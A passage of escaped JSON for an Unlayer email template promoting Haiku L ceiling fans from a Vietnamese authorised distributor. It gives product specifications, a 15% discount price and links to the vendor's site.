5px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922239248-log_hq.png\\\",\\\"width\\\":980,\\\"height\\\":130},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"IujIkibZVI\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 15px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">NH\\u00c0 CUNG C\\u1ea4P \\u1ee6Y QUY\\u1ec0N CH\\u00cdNH H\\u00c3NG HAIKU - BIG ASS FANS T\\u1ea0I VI\\u1ec6T NAM<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#236fa1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"wnM4rRZ1up\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"WlezPt2_J3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"56KZmfuYsA\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678340400926-haiku_head.jpg\\\",\\\"width\\\":1200,\\\"height\\\":800},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"EMkB6Vrllj\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a47e6b\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: Cabin, sans-serif; line-height: 28px; font-size: 20px;\\\\\\\"><span style=\\\\\\\"line-height: 28px;\\\\\\\">\\\\\\\"Haiku L mang \\u0111\\u1ebfn s\\u1ef1 tho\\u1ea3i m\\u00e1i v\\u1edbi s\\u1ef1 ho\\u00e0n h\\u1ea3o s\\u1ef1 im l\\u1eb7ng v\\u00e0 m\\u1ed9t ki\\u1ec3u d\\u00e1ng \\u0111\\u1eb9p, thi\\u1ebft k\\u1ebf c\\u1ed5 \\u0111i\\u1ec3n.\\\\\\\"<\\/span><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"VbL1kpvFRg\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#292828\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ B\\u1ea3o h\\u00e0nh: 03 n\\u0103m; \\u0111i\\u1ec1u ki\\u1ec7n l\\u1eafp \\u0111\\u1eb7t trong nh\\u00e0 BH 05 n\\u0103m<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ Di\\u1ec7n t\\u00edch l\\u00e0m m\\u00e1t: 52-inch: 15\\u2019 x 15\\u2019<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ \\u0110i\\u1ec1u khi\\u1ec3n t\\u1eeb xa: \\u0111i k\\u00e8m, tu\\u1ef3 ch\\u1ecdn th\\u00eam \\u0111i\\u1ec1u khi\\u1ec3n g\\u1eafn t\\u01b0\\u1eddng<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ T\\u1ed1c \\u0111\\u1ed9: 7 c\\u1ea5p<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ B\\u1ed9 \\u0111\\u00e8n: tu\\u1ef3 ch\\u1ecdn th\\u00eam \\u0111\\u00e8n LED 16 dimmable<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ M\\u00f3c treo qu\\u1ea1t: Universal, l\\u1eafp \\u0111\\u1eb7t tr\\u1ea7n nghi\\u00eang 33 \\u0111\\u1ed9<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">* <span style=\\\\\\\"font-size: 8px; line-height: 11.2px;\\\\\\\">HAIKU L ch\\u01b0a bao g\\u1ed3m M\\u00f4-\\u0111un Wi-Fi \\u0111\\u1ec3 k\\u1ebft n\\u1ed1i \\u0111i\\u1ec1u khi\\u1ec3n APP (iOS\\/Android). H\\u00e3y li\\u00ean h\\u1ec7 b\\u00e1n h\\u00e0ng \\u0111\\u1ec3 t\\u01b0 v\\u1ea5n th\\u00eam<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"lEJLAP7i5b\\\",\\\"type\\\":\\\"menu\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"menu\\\":{\\\"items\\\":[{\\\"key\\\":\\\"1678340668824\\\",\\\"text\\\":\\\"Haiku Indoor\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-h\\\",\\\"target\\\":\\\"_self\\\"}}},{\\\"key\\\":\\\"1678340683893\\\",\\\"text\\\":\\\"Haiku Outdoor\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-ngoai-troi\\\",\\\"target\\\":\\\"_self\\\"}}},{\\\"key\\\":\\\"1678340694153\\\",\\\"text\\\":\\\"Haiku I series\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-i\\\",\\\"target\\\":\\\"_self\\\"}}},{\\\"key\\\":\\\"1678340708083\\\",\\\"text\\\":\\\"Haiku L Series\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l\\\",\\\"target\\\":\\\"_self\\\"}}}]},\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"14px\\\",\\\"textColor\\\":\\\"#444444\\\",\\\"linkColor\\\":\\\"#0068A5\\\",\\\"align\\\":\\\"center\\\",\\\"layout\\\":\\\"horizontal\\\",\\\"separator\\\":\\\"|\\\",\\\"padding\\\":\\\"5px 15px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_menu_1\\\",\\\"htmlClassNames\\\":\\\"u_content_menu\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"n7WfELuq5h\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#a87f6b\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">T\\u00ccM HI\\u1ec2U TH\\u00caM<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":145,\\\"calculatedHeight\\\":37}},{\\\"id\\\":\\\"-H-RpfJAgN\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678340442333-mau-sau-haiku-L.jpg\\\",\\\"width\\\":1200,\\\"height\\\":800},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ecf0f1\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\\\",\\\"fullWidth\\\":false,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"width\\\":600,\\\"height\\\":224,\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"NcaesyMqCK\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"D15V5OdQMy\\\",\\\"contents\\\":[{\\\"id\\\":\\\"0qB6JF4LDN\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681813445393-HaikuL_1000Res_Caramel_White.jpg\\\",\\\"width\\\":1000,\\\"height\\\":667},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_5\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"a9T_o4TtZN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#e03e2d\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: \'comic sans ms\', sans-serif; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\"><strong>Sale Off 15%<br \\/>Ch\\u1ec9 c\\u00f2n 19.040.000 \\u20ab<br \\/><\\/strong><\\/span><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"LJC_ksl8Gr\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":400,\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#34495e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 28px;\\\\\\\">L\\u1ef0A CH\\u1eccN QU\\u1ea0T TR\\u1ea6N \\u0110\\u00daNG C\\u00c1CH<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ch7zwTHuZu\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"48%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#34495e\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"5px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"uhMkQt1D2G\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">V\\u1edbi 03 \\u0111\\u01b0\\u1eddng k\\u00ednh c\\u00e1nh, 03 t\\u00f9y ch\\u1ecdn l\\u1eafp \\u0111\\u1eb7t v\\u00e0 nhi\\u1ec1u lo\\u1ea1i c\\u00f3 s\\u1eb5n<br \\/>gi\\u1ea3m chi\\u1ec1u d\\u00e0i, Haiku l\\u00e0 m\\u1ed9t gi\\u1ea3i ph\\u00e1p tho\\u1ea3i m\\u00e1i tao nh\\u00e3 cho h\\u1ea7u nh\\u01b0 b\\u1ea5t k\\u1ef3<br \\/>kh\\u00f4ng gian, t\\u1eeb c\\u0103n h\\u1ed9 studio \\u1ea5m c\\u00fang cho \\u0111\\u1ebfn m\\u00e1i hi\\u00ean ngo\\u00e0i tr\\u1eddi.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"2z6L5HzXUD\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/drive.google.com\\/file\\/d\\/1M827CJDInvngku46rJxTUGe2U_b5PTZp\\/view\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#236fa1\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM H\\u01af\\u1edaNG D\\u1eaaN L\\u1ef0A CH\\u1eccN S\\u1ea2I C\\u00c1NH PH\\u00d9 H\\u1ee2P ?<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":393,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"gPbBQY2Q9v\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"w4JwDjRYXv\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UqCJOkDb9C\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a5726e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 19.6px; font-size: 14px;\\\\\\\">F O L L O W&nbsp; &nbsp;A L O N G&nbsp; &nbsp;W I T H&nbsp; &nbsp;U S<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"rktmzZAX4g\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"28%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#ca979a\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"tIS5FWVh8R\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"rounded\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/pinterest.com\\/\\\",\\\"name\\\":\\\"Pinterest\